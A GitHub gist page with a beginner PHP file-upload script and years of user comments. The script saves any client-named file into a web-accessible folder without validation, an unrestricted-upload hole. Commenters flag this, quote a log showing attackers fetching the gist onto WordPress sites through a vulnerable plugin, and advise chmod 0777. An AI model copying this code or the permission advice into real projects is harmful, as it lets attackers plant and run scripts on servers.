Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Simple file upload in php
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="upload.php" method="POST">
<p>Upload your file</p>
<input type="file" name="uploaded_file"></input><br />
<input type="submit" value="Upload"></input>
</form>
</body>
</html>
<?PHP
if(!empty($_FILES['uploaded_file']))
{
$path = "uploads/";
$path = $path . basename( $_FILES['uploaded_file']['name']);
if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
echo "The file ". basename( $_FILES['uploaded_file']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
?>
@amaddurrani
Copy link

amaddurrani commented Aug 17, 2018

Thanks alot it worked

@rlischer
Copy link

rlischer commented Aug 21, 2018

Works perfectly, thank you!

@yasin7044
Copy link

yasin7044 commented Aug 25, 2018

I am getting this error

Warning: move_uploaded_file(images/WIN_20180406_20_47_39_Pro.jpg): failed to open stream: Permission denied in /home/vhosts/www.eightballpool.ml/index.php on line 4

Warning: move_uploaded_file(): Unable to move '/tmp/phpKsH2uQ' to 'images/WIN_20180406_20_47_39_Pro.jpg' in /home/vhosts/www.eightballpool.ml/index.php on line 4

@BAHC
Copy link

BAHC commented Aug 29, 2018

Your "simple" gist someone is using in real suspicious way:

91.214.44.136 - - [27/Aug/2018:08:22:16 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=https://gist.githubusercontent.com/taterbase/2688850/raw/b9d214c9cbcf624e13c825d4de663e77bf38cc14/upload.php HTTP/1.1" 302 593 "-" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0"

@BAHC
Copy link

BAHC commented Aug 29, 2018

Please use action="PATH_TO_YOUR_UPLOAD_DIRECTORY/"; instead of action="upload.php" for this gist!
It is because there are someone using your gist to upload hazardous scripts at wordpress sites.

@gyaanesh
Copy link

gyaanesh commented Sep 7, 2018

really helpfull and easy to understand.
thank you

@yzzz-hub
Copy link

yzzz-hub commented Sep 7, 2018

@BAHC: it's not the code problem. resize.php should sanitize the input instead of loading whatever being injected into get parameter.

@GioRosso
Copy link

GioRosso commented Sep 20, 2018

hmm i wonder why if i upload a file larger than 1 mb the error came out -.-

I have the very same problem. Cannot upload files larger than 2MB. All file types are supported, but not all sizes. I don't think this has to do anything with the server, because I'm using PHP gallery, which uploads files up to 5MB.

Anyone?

@Amanrock123
Copy link

Amanrock123 commented Sep 29, 2018

Awesome tutorial ...it's help me a lot...
Visit www.cseworldonline.com

@Geekgurus
Copy link

Geekgurus commented Oct 23, 2018

Thanks for this man.
Its legit!

@diamond95
Copy link

diamond95 commented Oct 25, 2018

DID YOU REALLY CLOSED <input TAG WITH < /input> ??

ROFL

@qubadoff
Copy link

qubadoff commented Oct 29, 2018

good work

@wonsuc
Copy link

wonsuc commented Feb 7, 2019

I am getting this error

Warning: move_uploaded_file(images/WIN_20180406_20_47_39_Pro.jpg): failed to open stream: Permission denied in /home/vhosts/www.eightballpool.ml/index.php on line 4

Warning: move_uploaded_file(): Unable to move '/tmp/phpKsH2uQ' to 'images/WIN_20180406_20_47_39_Pro.jpg' in /home/vhosts/www.eightballpool.ml/index.php on line 4

Just give write permission to the folder.

@weshuiz
Copy link

weshuiz commented Jul 24, 2019

straight from w3school -_- and it isn't even protected against ufu exploit...

@yosoyhendrix
Copy link

yosoyhendrix commented Oct 3, 2019

¡INCREÍBLE! ¡GRACIAS!

upd:
curl -F "uploaded_file=@my_file.txt" http: //server/upload.php

😁😁😁😁

@faiswal
Copy link

faiswal commented Feb 28, 2020

i do not know where files go after uploading them

@mdyrma2
Copy link

mdyrma2 commented Apr 6, 2020

Thank you very much. Good tutorial.

@rwb99
Copy link

rwb99 commented Apr 18, 2020

make a "uploads" directory in the same place as you php file
mkdir uploads

change directory permissions
chmod 0777 /var/www/html/uploads

also make sure file_uploads = On is set in php.ini

setting upload_max_filesize = 10M and
post_max_size = 10M in php.ini should allow up to 10MB

but you also need to set client_max_body_size 10M; in nginx config or LimitRequestBody 10485760 in Apache

I'm still not having any success with uploading anything over 2mb

I'm using it for a wget server

@0cirius0
Copy link

0cirius0 commented May 21, 2020

Thanks for this script.It really helped to solve bigger issue i was having in understanding a php upload code

@munjoob
Copy link

munjoob commented Jul 13, 2020

try kleeja php file upload script
https://kleeja.org

@vparitorres
Copy link

vparitorres commented Aug 27, 2020

Excelente ejemplo.. Gracias por publicar..

@kicktv
Copy link

kicktv commented Oct 28, 2020

@taterbase

work good.
thanks for the script

@justinweichTV
Copy link

justinweichTV commented Nov 1, 2020

it dosent work

@dsinclair-work
Copy link

dsinclair-work commented Dec 17, 2020

Awesome script, works great as long as you create an upload folder in the same destination as the upload.php

Copy link

ghost commented Feb 1, 2021

thanks a lot bro :D

@FAlbanni
Copy link

FAlbanni commented May 12, 2021

This sucks anyone would be able to upload a .php file and take control of your server, do NOT use it!

@AllenJB
Copy link

AllenJB commented Oct 9, 2021

This is a terrible example of handling file uploads.

It does not check for file upload errors (via the 'errors' element under $_FILES).

The 'name' is specified by the client and should not be trusted. It may also contain characters that are not valid for filenames on the servers filesystem.

There's no handling of duplicate filenames - one file upload could overwrite a previous file upload.

This code does not check the content of the uploaded file. You may be expecting an image to be uploaded, but the client may upload a PHP script instead - if that file is uploaded to a web accessible directory, the client could then execute that PHP script. This would lead to further compromises of your server and/or your hosting being used for malicious purposes (phishing, illegal content).

You should always check the content of uploaded files using the fileinfo extension, mime_content_type(), or a function specific to the expected content type (eg. the type returned by getimagesize() for images)

@Noemi4
Copy link

Noemi4 commented Jan 1, 2022

Thank you very much, this one finally works!

@Noemi4
Copy link

Noemi4 commented Jan 1, 2022

For the ones complaining, the point of this script is that beginners can understand the base code for uploading files, and can add validation afterwards.

@TinySonhh
Copy link

TinySonhh commented Feb 7, 2022

Thank you,

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment